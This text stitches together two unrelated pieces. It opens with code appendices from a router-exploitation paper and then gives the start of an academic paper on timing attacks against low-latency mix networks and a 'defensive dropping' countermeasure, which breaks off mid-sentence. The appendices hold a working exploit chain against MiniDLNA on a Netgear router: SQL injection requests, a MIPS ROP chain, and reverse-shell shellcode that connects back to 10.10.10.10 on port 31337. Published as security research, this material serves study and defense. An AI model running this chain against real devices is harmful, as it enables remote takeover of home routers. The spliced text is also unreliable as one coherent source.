objects_insert_query='insert/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)'+\
'/**/VALUES("PWNED","PWNED","container","31337");'
details_delete_query='delete/**/from/**/DETAILS/**/where/**/ID="31337";'
objects_delete_query='delete/**/from/**/OBJECTS/**/where/**/OBJECT_ID="PWNED";'
def build_injection_req(query):
request=path_beginning+query+path_ending
return request
def do_get_request(request):
conn=httplib.HTTPConnection(host,8200)
conn.request("GET",request,"",headers)
conn.close()
def build_update_query(string):
details_update_query='update/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART'+\
'||"'+string+'"/**/where/**/ID="31337";'
return details_update_query
def clear_overflow_data():
print "Deleting existing overflow data..."
request=build_injection_req(details_delete_query)
do_get_request(request)
request=build_injection_req(objects_delete_query)
do_get_request(request)
time.sleep(1)
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
24
def insert_overflow_data():
print("Setting up initial database records....")
request=build_injection_req(objects_insert_query)
do_get_request(request)
request=build_injection_req(details_insert_query)
do_get_request(request)
print("Building long ALBUM_ART string.")
for string in overflow_strings:
req=build_injection_req(build_update_query(string))
do_get_request(req)
clear_overflow_data()
insert_overflow_data()
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
25
Appendix C
#!/usr/bin/env python
#dlnaclient.py
# A program browse the content directory for a specific object
# Use to analyze DLNA conversation in order to identify appropriate
# SOAP request to query the desired object.
# Author: Zachary Cutlip
# [email protected]
# Twitter: @zcutlip
from twisted.internet import reactor
from coherence.base import Coherence
from coherence.upnp.devices.control_point import ControlPoint
from coherence.upnp.core import DIDLLite
# called for each media server found
def media_server_found(client, udn):
print "media_server_found", client
d = client.content_directory.browse('PWNED',
browse_flag='BrowseDirectChildren', requested_count=100,process_result=False,
backward_compatibility=False)
def media_server_removed(udn):
print "media_server_removed", udn
def start():
control_point = ControlPoint(Coherence({'logmode':'warning'}),
auto_client=['MediaServer'])
control_point.connect(media_server_found,
'Coherence.UPnP.ControlPoint.MediaServer.detected')
control_point.connect(media_server_removed,
'Coherence.UPnP.ControlPoint.MediaServer.removed')
if __name__ == "__main__":
reactor.callWhenRunning(start)
reactor.run()
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
26
Appendix D
soaprequest.xml:
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<ns0:Browse xmlns:ns0="urn:schemas-upnp-org:service:ContentDirectory:1">
<ObjectID>PWNED</ObjectID>
<BrowseFlag>BrowseDirectChildren</BrowseFlag>
<Filter>*</Filter>
<StartingIndex>0</StartingIndex>
<RequestedCount>100</RequestedCount>
<SortCriteria />
</ns0:Browse>
</s:Body>
</s:Envelope>
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
27
Appendix E
# exploitbuffer.py
# Author: Zachary Cutlip
# [email protected]
# Twitter: @zcutlip
# An exploit buffer and reverse TCP connect-back payload
# targetting vulnerable callback() funcgion in
# MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.
# Connect-back IP address: 10.10.10.10
# Port: 31337
class DlnaOverflowBuilder:
MIPSNOPSTRING="\x27\x70\xc0\x01"*8
pattern128_1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8"+
"Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
pattern128_2="2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1"+
"Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4A"
pattern128_3="i5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4"+
"Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7"
pattern128_4="Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao"+
"7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar"
pattern40_5="0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"
pattern40_5="0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"
pattern8_6="As4A6As7"
pattern16_7="0At1At2At3At4At5"
pattern28_8="t7At8At9Au0Au1Au2Au3Au4Au5Au"
pattern32_9="8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7"
pattern64_10="o9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar"
pattern40_11="2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5"
connect_back=["\xfd\xff\x0f\x24\x27",
"x'20'", #SQL escape
"\xe0\x01\x27\x28\xe0\x01\xff\xff\x06\x28",
"\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f",
"\xfd\xff\x0f\x24\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x7a\x69\x0e\x3c",
"\x7a\x69\xce\x35\xe4\xff\xae\xaf\x0a\x0a",
"x'0d'", #SQL escape
"\x3c\x0a\x0a\xad\x35",
"\xe6\xff\xad\xaf\xe2\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01",
"\x4a\x10\x02\x24\x0c\x01\x01\x01\xfd\xff\x0f\x24\x27\x28\xe0\x01",
"\xff\xff\xa4\x8f\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa5",
"x'20'", #SQL escape
"\xff\xff\x01\x24\xfb\xff\xa1\x14\xff\xff\x06\x28\x62\x69\x0f\x3c",
"\x2f\x2f\xef\x35\xf4\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35",
"\xf8\xff\xae\xaf\xfc\xff\xa0\xaf\xf4\xff\xa4\x27\xd8\xff\xa4\xaf",
"\xff\xff\x05\x28\xdc\xff\xa5\xaf\xd8\xff\xa5\x27\xab\x0f\x02\x24",
"\x0c\x01\x01\x01\xff\xff\x06\x28"]
def initial_overflow(self):
overflow_data=[]
overflow_data.append("AA")
overflow_data.append(self.pattern128_1)
overflow_data.append(self.pattern128_2)
overflow_data.append(self.pattern128_3)
overflow_data.append(self.pattern128_4)
overflow_data.append(self.pattern40_5)
return overflow_data
SQL
Injection
to
MIPS
Overflows:
Rooting
SOHO
Routers
Zachary
Cutlip
28
def rop_chain(self):
ropchain=[]
#jalr s6
ropchain.append("\xac\x02\x12\x2b")
ropchain.append(self.pattern8_6)
#cacheflush()
ropchain.append("\xb8\xdf\xf3\x2a")
#jalr s0
ropchain.append("\xc4\x41\x0e\x2b")
ropchain.append(self.pattern16_7)
#move t9,s3
#jalr t9
ropchain.append("\x08\xde\x16\x2b")
ropchain.append(self.pattern28_8)
#load offset from sp into S6, then jalr S1
ropchain.append("\x30\x9d\x11\x2b")
ropchain.append(self.pattern32_9)
#load offset from sp into S6, then jalr S1
ropchain.append("\x30\x9d\x11\x2b")
ropchain.append(self.pattern64_10)
ropchain.append("abcd")
#avoid crashing memcpy
ropchain.append("\x32\xc9\xa3\x15")
ropchain.append("D"*12)
ropchain.append("\x32\xc9\xa3\x15")
ropchain.append(self.pattern128_1)
ropchain.append(self.pattern40_11)
return ropchain
def payload(self):
payload=[]
for i in xrange(0,1):
payload.append(self.MIPSNOPSTRING)
for string in self.connect_back:
payload.append(string)
#for debugging purposes so we can locate our shellcode in memory
payload.append("D"*4)
return payload | pdf |
Timing Attacks in Low-Latency Mix Systems
(Extended Abstract)
Brian N. Levine1, Michael K. Reiter2, Chenxi Wang2, and Matthew Wright1
1 University of Massachusetts, Amherst, MA, USA; {brian,mwright}@cs.umass.edu
2 Carnegie Mellon University, Pittsburgh, PA, USA; {reiter,chenxi}@cmu.edu
Abstract. A mix is a communication proxy that attempts to hide the
correspondence between its incoming and outgoing messages. Timing
attacks are a significant challenge for mix-based systems that wish to
support interactive, low-latency applications. However, the potency of
these attacks has not been studied carefully. In this paper, we investigate
timing analysis attacks on low-latency mix systems and clarify the threat
they pose. We propose a novel technique, defensive dropping, to thwart
timing attacks. Through simulations and analysis, we show that defensive
dropping can be effective against attackers who employ timing analysis.
1
Introduction
A mix [6] is a communication proxy that attempts to hide the correspondence
between its incoming and outgoing messages. Routing communication through
a chain of mixes is a powerful tool for providing unlinkability of senders and
receivers despite observation of the network by a global eavesdropper and the
corruption of many mix servers on the path. A mix can use a variety of tech-
niques for hiding the relationships between its incoming and outgoing messages.
In particular, it will typically transform them cryptographically, delay them,
reorder them, and emit additional “dummy” messages in its output. The effec-
tiveness of these techniques have been carefully studied (e.g., [4, 12, 18, 15,13]),
but mainly for high-latency systems, e.g., anonymous email or voting applica-
tions that do not require efficient processing. In practice, such systems may take
hours to deliver a message to its intended destination.
Users desire anonymity for more interactive applications, such as web brows-
ing, online chat, and file-sharing, all of which require a low-latency connection. A
number of low-latency mix-based protocols for unlinkable communications have
been proposed, including ISDN-Mixes [14], Onion Routing [16], Tarzan [10], Web
Mixes [3], and Freedom [2]. Unfortunately, there are a number of known attacks
on these systems that take advantage of weaknesses in mix-based protocols when
they are used for low-latency applications [19, 2, 20].
The work of Levine and Wright was supported in part by National Science Founda-
tion awards ANI-0087482 and EIA-0080199. The work of Reiter, Wang, and Wright
was supported in part by National Science Foundation award CCR-0208853 and a
grant from the Air Force F49620-01-1-0340.
2
Levine, Reiter, Wang, and Wright
The attack we consider here is timing analysis, where an attacker studies the
timings of messages moving through the system to find correlations. This kind
of analysis might make it possible for two attacker mixes (i.e., mixes owned or
compromised by the attacker) to determine that they are on the same communi-
cation path. In some systems, this allows these two attacker mixes to match the
sender with her destination. Unfortunately, it is not known precisely how vul-
nerable these systems are in practice and whether an attacker can successfully
use timing analysis for these types of attacks. For example, some research has
assumed that timing analysis is possible when dummy messages are not used [20,
21, 19], though this has not been carefully examined.
In this paper, we significantly clarify the threat posed to low-latency mix
systems by timing attacks through detailed simulations and analysis. We show
that timing attacks are a serious threat and are easy to exploit by a well-placed
attacker. We also measure the effectiveness of previously proposed defenses such
as cover traffic and the impact of path length on the attack. Finally, we intro-
duce a new variation of cover traffic that better defends against the attacks we
consider, and demonstrate this through our analysis. Our results are based pri-
marily on simulations of a set of attacking mixes that attempt to perform timing
attacks in a realistic network setting.
We begin by providing background on low-latency mix-based systems and
known attacks against them in Section 2. We present our system and attacker
model in Section 3. In Section 4, we discuss the possible timing attacks against
such systems and possible defenses. We present a simulation study in Section 5
in which we test the effectiveness of attacks and defenses. Section 6 gives the
results of this study. We discuss the meaning of these results in light of different
types of systems in Section 7 and we conclude in Section 8.
2
Background
A number of low-latency mix-based systems have been proposed, but systems
vary widely in their attention to timing attacks of the form we consider here.
Some systems, notably Onion Routing [19] and the second version of the Free-
dom [2] system, offer no special provisions to prevent timing analysis. In such
systems, if the first and last mixes on a path are compromised, effective timing
analysis may allow the attacker to link the sender and receiver identities [19].
When both the first and last mixes are chosen randomly with replacement from
the set of all mixes, the probability of attacker success is given as c2
n2 , where c is
the number of attacker-owned mixes and n is the total number of mixes.
Both Tarzan [10] and the original Freedom system [2] use constant-rate cover
traffic between pairs of mixes, sending traffic only between covered links. This
defense makes it very difficult for an eavesdropper to perform timing analysis,
since the flows on each link are independent. In Freedom, however, the attack
is still possible for an eavesdropper, since there is no cover traffic between the
initiator and the first mix on the path, and between the last mix and the re-
sponder, the final destination of the initator’s messages. This exposed traffic,
Timing Attacks in Low-Latency Mix Systems
3
M I
1
M I
2
M I
h
I
Responder
Initiator
Proxies
...
Fig. 1. A path P I with an initiator I (leftmost) communicating with a responder
(rightmost). M I
1 and M I
h, the first and last mixes on the path originating at I, are
controlled by attackers.
along with the exposed traffic leaving the path, can be linked via timing anal-
ysis. Additionally, both systems are still vulnerable to timing analysis between
attacker-controlled mixes. The mixes can distinguish between cover traffic and
real traffic and will only consider the latter for timing analysis. This nullifies the
effect of this form of cover traffic when attacker mixes are considered.
Web-Mixes [3], ISDN-Mixes [14], and Pipenet [7] all use a constant-rate cover
traffic along the length of the path, i.e., by sending messages at a constant rate
through each path. In these systems, it is unclear whether timing analysis is
possible, since each initiator appears to send a constant rate of traffic at all
times. An Onion Routing proposal for partial-path cover traffic is an extension
of this idea [19]. In this case, the cover traffic only extends over a prefix of the
path. Mixes that appear later in the path do not receive the cover traffic and
only see the initiator traffic. Thus, an attacker mix in the covered prefix sees a
very different traffic pattern than an attacker mix in the uncovered suffix. It is
thus conceivable that the two mixes should find timing analysis more difficult.
3
System Model
Recall that our goal is to understand the threat posed by timing analysis attacks.
In this section, we develop a framework for studying different analysis methods
and defenses against them. We begin by presenting a system and attacker model.
In the next section, we use this model to analyze attacks and defenses.
Figure 1 illustrates an initiator’s path in a mix system. We focus on a particu-
lar initiator I, who uses a path, P I, of mixes in the system. The path P I consists
of a sequence of h mixes that starts with M I
1 and ends with M I
h. Although in
many protocols the paths of each initiator can vary, to avoid cumbersome nota-
tion and without loss of generality, we let h denote the last mix in that particular
path; our results do not assume a fixed or known path length. M I
1 receives pack-
ets from the initiator I, and M I
h sends packets to the appropriate responders. We
assume that each link between two mixes typically carries packets from multiple
initiators, and that for each packet received, a mix can identify the path P I
to which the packet corresponds. This is common among low-latency mix sys-
tems, where when a path P I is first established, every mix server on P I is given
a symmetric encryption key that it shares with I, and with which it decrypts
(encrypts) packets traversing P I in the forward (respectively, reverse) direction.
We assume that M I
h recognizes that it is the last mix on the path P I. We also
4
Levine, Reiter, Wang, and Wright
assume that mix M I
1 recognizes that it is the first mix on the path P I and thus
that I is, in fact, the initiator.
Though not shown in Figure 1, in our model we assume there are many paths
through the system We are interested in the case where an attacker controls M I
1
and M J
h on two paths P I and P J that are not necessarily distinct. The attacker’s
goal is to determine whether I = J. If I = J and the attacker ascertains this,
then it learns the responders to which I is communicating.
For these scenarios, we focus on the adversary’s use of timing analysis to
determine whether I = J. Packets that I sends along P I run on a general-
purpose network between the initiator I and M I
1 , and between each pair M I
k
and M I
k+1. On this stretch of network there are dropped packets and variable
transmission delays. Since these drops and delays affect packet behavior as seen
further along the path, they can form a basis on which the attacker at M I
1 and
M J
h , for example, can infer that I = J. Indeed, the attacker may employ active
attacks that modify the timings of packets emitted from M I
1 or intentionally drop
packets at M I
1 , to see if these perturbations are reflected at M J
h . For simplicity,
we generally assume that the attacker has no additional information to guide his
analysis, i.e., that there is no a priori information as to whether I = J.
4
Timing Attacks and Defenses
In this section, we describe the kinds of methods that an attacker in our model
can use to successfully perform timing analysis. Additionally, we discuss defenses
that can be used in the face of these kinds of attacks. In particular, we introduce
a new type of cover traffic to guard against timing attacks.
4.1
Timing Analysis Attacks
The essence of a timing attack is to find a correlation between the timings of
packets seen by M I
1 and those seen by an end point M J
h . The stronger this
correlation, the more likely I = J and M J
h is actually M I
h. Attacker success
also depends on the relative correlations between the timings at which distinct
initiators I and J emit packets. That is, if M I
1 and M J
1 happen to see exactly
the same timings of packets, then it is not be possible to determine whether the
packet stream seen at M J
h is a match for M I
1 or M J
1 .
To study the timing correlations, the most intuitive random variable for the
attacker is the difference, δi, between the arrival time of a packet i and the arrival
time of its successor packet. If the two attacker mixes are on the same path P I,
there should be a correlation between the δi values seen at the two mixes; for
example, if δi is relatively large at M I
1 , then the δi at M I
h is more likely to be
larger than average. The correlation does not need to be strong, as long as it is
stronger than the correlations that would occur between M I
1 and M J
h , for two
different initiators I and J.
Unfortunately, this random variable is highly sensitive to dropped packets. A
dropped packet that occurs between M I
1 and M I
h will cause later timings to be
Timing Attacks in Low-Latency Mix Systems
5
off by one. As a result, the correlation will be calculated between packets that
are not matched—an otherwise perfect correlation will appear to be a mismatch.
Therefore, we extract a new random variable from the data that is less sensi-
tive to packet drops. We use nonoverlapping and adjacent windows of time with
a fixed duration W. Within instance k of this window, mix M maintains a count
XI
k of the number of packet arrivals on each path, P I, in which M participates.
Our analysis then works by cross correlating X I
k and XJ
k at the two different
mixes.
To enhance the timing analysis, the attacker can employ a more active ap-
proach. Specifically, the attacker can drop packets at M I
1 intentionally. These
drops and the gaps they create will propagate to M I
h and should enhance the
correlation between the two mixes. Additionally, a careful placement of packet
drops can effectively reduce the correlation between M I
1 and M J
1 for I ̸= J.
4.2
The Defenses
A known defense against timing attacks is to use a constant rate of cover traffic
along the length of the entire path [14, 7]. This defense is useful, since it dra-
matically lowers the correlations between M I
1 and M I
h. The lowered correlations
may seem unexpected, since both nodes will now see approximately the same
number of packets at all times. The difference is that the variations in packet
delays must now be correlated: a long delay between two packets at M I
1 must
match a longer-than-average delay between the same two packets at M I
h for the
correlation to increase. If the magnitude of variation between M I
1 and M I
h dom-
inates the magnitude of variation between I and M I
1 , this matching will often
fail, reducing the correlation between the two streams.
This approach faces serious problems, however, when there are dropped pack-
ets before or at M I
1 . Dropped packets provide holes in the traffic, i.e., gaps where
there should have been a packet, but none appeared. With only a few such holes,
the correlation should increase for M I
1 and M I
h, while the correlation between
M J
1 and M I
h should decrease. Packet drops can happen due to network events
on the link between the initiator and M I
1 , or the attacker can have M I
1 drop
these packets intentionally.
We now introduce a new defense against timing analysis, called defensive
dropping. With defensive dropping, the initiator constructs some of the dummy
packets such that an intermediate mix M I
m, 1 ≤ m ≤ h, is instructed to drop
the packet. To achieve this, we only need one bit inside the encryption layer for
M I
m. If M I
m is an honest participant, it will drop the dummy packet rather than
sending it to the next mix (there will only be a random string to pass on anyway,
but an attacker might try to resend an older packet). If these defensive drops
are randomly placed with a sufficiently large frequency, the correlation between
the first attacker and the last attacker will be reduced.
Defensive dropping is a generalization of “partial-path cover traffic,” in which
all of the cover traffic is dropped at a designated intermediate mix [19]. To
further generalize, we note that the dropping need not be entrusted to a single
6
Levine, Reiter, Wang, and Wright
mix. Rather, multiple intermediate mixes can collectively drop a set of packets.
We discuss and analyze defensive dropping in depth in Section 7.
5
Simulation Methodology
We determined the effectiveness of timing analysis and various defenses using a
simulation of network scenarios. We isolated timing analysis from path selection,
a priori information, and any other aspects of a real attack on the anonymity and
unlinkability of initiators in a system. To achieve this, the simulations modeled
only the case when an attacker controls both the first and the last mix in the
path — this is the key position in a timing attack.
We simulated two basic scenarios of mixes: one based on high-resource servers;
and a second based on low-resource peers. In the server scenario, each mix is a
dedicated server for the system, with a reliable low-latency link to the Inter-
net. This means that the links between each mix are more reliable with low to
moderate latencies, as described below. In the peer-based scenario, each mix is
also a general purpose computer that may have an unreliable or slow link to the
Internet. Thus, the links between mixes have more variable delays and are less
reliable on average in a peer-based setting.
The simulation selected a drop rate for each link using an exponential distri-
bution around an average value. We modeled the drop rate on the link between
the initiator and first mix differently than those on the links between mixes.
The link between the initiator and the first mix exhibits a drop rate, called the
early drop rate (edr), with average either 1% or 5%. In the server scenario, the
average inter-mix drop rate (imdr) is either 0%, meaning that there are no drops
on the link, or 1%. For the imdr in the peer-based scenario, we use either 1% or
5% percent as the average drop rate. The lower imdr in the server case reflects
good network conditions as can usually be seen on the Internet Traffic Report
(http://www.internettrafficreport.com). For many test points on the Internet,
there is typically a drop rate of 0%, with occasional jumps to about 1%. Some
test points see much worse network performance, with maximal drop rates ap-
proaching 25%. Since these high rates are rare, we allow them only as unusually
high selections from the exponential distribution using a lower average drop rate.
For the peer-based scenario, the average delay on a link is selected using a
distribution from a study of Gnutella peers [17]. The median delay from this
distribution is about 112ms, but the 98th percentile is close to 3.1 seconds,
so there is substantial delay variation. For the server scenario, we select a less
variable average delay, using a uniform distribution between 0ms and 1ms (“low”
delay) or between 0ms and 100ms (“high” delay). Given an average delay for a
link, the actual per-packet delays are selected using an exponential distribution
with that delay as the mean. This is consistent with results from Bolot [5].
In addition to edr, imdr, and delays, the simulation also accounts for the
length of the initiator’s path and the initiator’s communication rates. The path
length can either be 5 or 8 or selected from a uniform distribution between these
Timing Attacks in Low-Latency Mix Systems
7
values. Larger path lengths are more difficult to use, since packets must have a
fixed length [6].
Generating initiator traffic requires a model of initiator behavior. For this
purpose, we employ one of four models for initiator behavior:
– HomeIP: The Berkeley HomeIP traffic study [11] has yielded a collection
of traces of 18 days worth of HTTP traffic from users connecting to the Web
through a Berkeley modem pool in 1996. From this study, we determined the
distribution of times between each user request. To generate times between
initiator requests during our simulation, we generate uniformly random num-
bers and use those to select from the one million points in the distribution.
– Random: We found that the HomeIP-based traffic model generated rather
sparse traffic patterns. Although this is representative of many users’ brows-
ing behavior due to think times, we also wanted to consider a more active
initiator model. To this end, we ran tests with traffic generated using an ex-
ponentially distributed delay between packets, with a 100ms average. This
models an active initiator without any long lags between packets.
– Constant: For other tests, we model initiators with that employ constant
rate path cover traffic. This traffic generator is straightforward: the initiator
emits messages along the path at a constant rate of five packets per second,
corresponding to sending dummy messages when it does not have a real
message to send. (Equivalently, the Random traffic model may be thought
of as a method of generating somewhat random cover traffic along the path.)
– Defensive Dropping: Defensive Dropping is similar to Constant, as the
initiator sends a constant rate of cover traffic. The difference is that packets
are randomly selected to be dropped. The rate of packets from the initiator
remains at five packets per second, with a chosen drop rate of 50 percent.
Given a set of values for all the different parameters, we simulate the initia-
tor’s traffic along the length of her path and have the attacker save the timings
of packets received at the first and last mixes. We generate 10,000 such simula-
tions. We then simulate the timing analysis by running a cross correlation test
on the timing data taken from the two mixes. We test mixes on the same path
as well as mixes from different paths.
The statistical correlation test we chose works by taking adjacent windows of
duration W. Each mix counts the number of packets Xk it receives per path in
the k-th window. We then cross-correlate the sequence {xk} of values observed
for a path at one mix, with the sequence {x′
k} observed for a path at a different
mix. Specifically, the cross correlation at delay d is defined to be
r(d) =
i
(xi − µ)
x′
i+d − µ′
i (xi − µ)2
i
x′
i+d − µ′2
where µ is the mean of {xk} and µ′ is the mean of {x′
k}. We performed tests
with W = 10 seconds and d = 0; as we will show, these yielded useful results for
the workloads we explored.
8
Levine, Reiter, Wang, and Wright
imdr
0%
1%
5%
traffic
delay
low
high
low
high gnutella gnutella
pattern
edr
HomeIP
1%
0.0000 0.0003 0.0007 0.0008
0.0026
0.0061
5%
0.0001 0.0005 0.0008 0.0010
0.0039
0.0070
Random
1%
0.0000 0.0000 0.0000 0.0000
0.0002
0.0003
5%
0.0000 0.0000 0.0000 0.0000
0.0004
0.0005
Constant
1%
0.0011 0.0346 0.0350 0.0814
0.1372
0.2141
5%
0.0002 0.0079 0.0108 0.0336
0.0557
0.1014
Defensive Dropping 1%
0.1925 0.2424 0.2022 0.2506
0.2875
0.3117
5%
0.0930 0.1233 0.1004 0.1289
0.1550
0.1830
Table 1. Equal error rates for simulations with path lengths between 5 and 8, inclusive.
The rows represent the initiator traffic model and drop rate before reaching the first
mix (edr). The columns represent the delay characteristics and drop rates (imdr) on
each link between the first mix and the last mix. See Section 5 for details.
We say that we calculated r(0; I, J) if we used values {xk} from packets on
P I as seen by M I
1 and used values {x′
k} from packets on P J as seen by M J
h .
We infer that the values {xk} and {x′
k} indicate the same path (the attackers
believe that I = J) if |r(0; I, J)| > t for some threshold, t. For any chosen t, we
calculate the rate of false positives: the fraction of pairs (I, J) such that I ̸= J
but |r(0; I, J)| > t. We also compute the false negatives: the fraction of initiators
I for which |r(0; I, I)| ≤ t.
6
Evaluation Results
Decreasing the threshold, t, raises the false positive rate and decreases the false
negative rate. Therefore, an indication of the quality of a timing attack is the
equal error rate, obtained as the false positive and negative rates once t is ad-
justed to make them equal. The lower the equal error rate, the more accurate
the test is.
Representative equal error rate results are shown in Table 1. For all of these
data points, the initiator’s path length is selected at random between 5 and 8,
inclusive. Not represented are data for fixed path lengths of 5 and 8; lower path
lengths led to lower equal error rates overall.
Results presented in Table 1 show that the timing analysis tests are very
effective over a wide range of network parameters when there is not constant rate
cover traffic. With the HomeIP traffic, the equal error rate never rises to 1%.
Such strong results for attackers could be expected, since initiators often have
long gaps between messages. These gaps will seldom match from one initiator
to another.
Perhaps more surprising is the very low error rates for the attack for the
Random traffic flows (exponentially distributed interpacket delays with average
delay of 100ms). One might expect that the lack of significant gaps in the data
Timing Attacks in Low-Latency Mix Systems
9
would make the analysis more difficult for the attacker. In general, however,
the gaps still dominate variation in the delay. This makes correlation between
unrelated streams unlikely, while maintaining much of the correlation along the
same path.
When constant rate cover traffic is used, the effectiveness of timing analysis
depends on the network parameters. When the network has few drops and low
latency variation between the mixes, the attacker continues to do well. When
imdr = 0% and the inter-mix delay is less than 1ms, meaning that the variation
in the delay is also low, the timing analysis had an equal error rates of 0.0011 and
0.0002, for edr = 1% and edr = 5%, respectively. Larger delays and higher drop
rates lead to higher error rates for the attacker. For example, with imdr = 1%
drop rate and delays between 0ms and 100ms between mixes, the error rates
become 0.0814 for edr = 1% and 0.0336 for imdr = 5%.
6.1
Effects of Network Parameters
To better compare how effective timing analysis tests are with different network
parameters, we can use the rates of false negatives and false positives to get a
Receiver Operator Characteristic (ROC) curve (see http://www.cmh.edu/stats/
ask/roc.asp). Let fp denote the false positive rate and fn denote the false negative
rate. Then fp is the x-axis of a ROC curve and 1 − fn is the y-axis. A useful
measure of the quality of a particular test is the area under the curve (AUC).
A good test will have an AUC close to 1, while poor tests will have an AUC as
low as 0.5. We do not present AUC values. The relative value of each test will
be apparent from viewing their curves on the same graph; curves that are closer
to the upper left-hand corner are better. We only give ROC curves for constant
rate cover traffic, with and without defensive dropping, as the other cases are
generally too close to the axes to see.
We can see from the ROC curves in Figure 2 how the correlation tests perform
with varying network conditions. The bottommost lines in Figures 2(a–b) show
that the test is least accurate with imdr = 5% and the relatively large delays
taken from the Gnutella traffic study. imdr appears to be the most significant
parameter, and as the imdr lowers to 1% and then 0% on average, the ROC
curve gets much closer to the upper left hand corner. Delay also impacts the
error rates, but to a lesser extent. Low delays result in fewer errors by the test
and a ROC curve closer to the upper-left-hand corner.
In Figure 2(c), we see how the correlation tests are affected by edr. edr’s
effect varies inversely to that of imdr. With edr = 5%, the area under the ROC
curve is relatively close to one. Note that the axes only go down on the y-axis
to 0.75 and right on the x-axis to 0.25. For the same imdr, correlation tests with
edr = 1% have significantly higher error.
Figure 2(d) graphs the relationship between path length an success of the
attackers. Not surprisingly, longer paths decrease the attackers success as there
is more chance for the network to introduce variability in streams of packets.
We can compare the use of defensive dropping with constant rate cover traffic
in Figures 2(e–f). It is clear that in both models, the defensive dropping ROC
10
Levine, Reiter, Wang, and Wright
0.5
0.55
0.6
0.65
0.7
0.75
0.8
0.85
0.9
0.95
1
0
0.05
0.1
0.15
0.2
0.25
0.3
0.35
0.4
0.45
0.5
1 - (False Negative Rate)
False Positive Rate
imdr = 0%, low delay
imdr = 0%, high delay
imdr = 1%, low delay
imdr = 1%, high delay
imdr = 1%, p2p delay
imdr = 5%, p2p delay
0.5
0.55
0.6
0.65
0.7
0.75
0.8
0.85
0.9
0.95
1
0
0.05
0.1
0.15
0.2
0.25
0.3
0.35
0.4
0.45
0.5
1 - (False Negative Rate)
False Positive Rate
imdr = 0%, low delay
imdr = 0%, high delay
imdr = 1%, low delay
imdr = 1%, high delay
imdr = 1%, p2p delay
imdr = 5%, p2p delay
(a) edr = 1%
(b) edr = 5%
0.75
0.8
0.85
0.9
0.95
1
0
0.05
0.1
0.15
0.2
0.25
1 - (False Negative Rate)
False Positive Rate
edr = 5%, imdr = 0%
edr = 5%, imdr = 1%
edr = 1%, imdr = 0%
edr = 1%, imdr = 1%
0.95
0.96
0.97
0.98
0.99
1
0
0.005
0.01
0.015
0.02
0.025
0.03
0.035
0.04
0.045
0.05
1 - (False Negative Rate)
False Positive Rate
path length = 5
uniform between 5 and 8
path length = 8
(c) high link delay
(d) edr = 5%, imdr = 1%, high link delay
0.5
0.55
0.6
0.65
0.7
0.75
0.8
0.85
0.9
0.95
1
0
0.05
0.1
0.15
0.2
0.25
0.3
0.35
0.4
0.45
0.5
1 - (False Negative Rate)
False Positive Rate
imdr = 0%, no def. dropping
imdr = 1%, no def. dropping
imdr = 0%, w/ def. dropping
imdr = 1%, w/ def. dropping
0.5
0.55
0.6
0.65
0.7
0.75
0.8
0.85
0.9
0.95
1
0
0.05
0.1
0.15
0.2
0.25
0.3
0.35
0.4
0.45
0.5
1 - (False Negative Rate)
False Positive Rate
imdr = 0% , no def. dropping
imdr = 1%, no def. dropping
imdr = 0%, w/ def. dropping
imdr = 1%, w/ def. dropping
(e) edr = 1%, high link delay
(f) edr = 5%, high link delay
Fig. 2. ROC curves of simulation results.
Timing Attacks in Low-Latency Mix Systems
11
curves are much further from the upper-left-hand corner than the curves based
on tests without defensive dropping. It makes a much larger difference than the
imdr. From Figures 2(a–b), we know that imdr is an important factor in how well
these tests do. Since defensive dropping has a much larger impact than imdr, we
know that it does much better than typical variations in network conditions for
confusing the attacker.
7
Discussion
Given that we have isolated the timing analysis apart from the systems and at-
tacks, we now discuss the implications of our results. We first note that, rather
than in isolation along a single path, timing analysis would occur in a system
with many paths from many initiators. This creates both opportunities and dif-
ficulties for an attacker. We begin by showing how the attacker’s effectiveness
is reduced by prior probabilities. We then show how, when paths or network
conditions change, and when initiators make repeated or long-lasting connec-
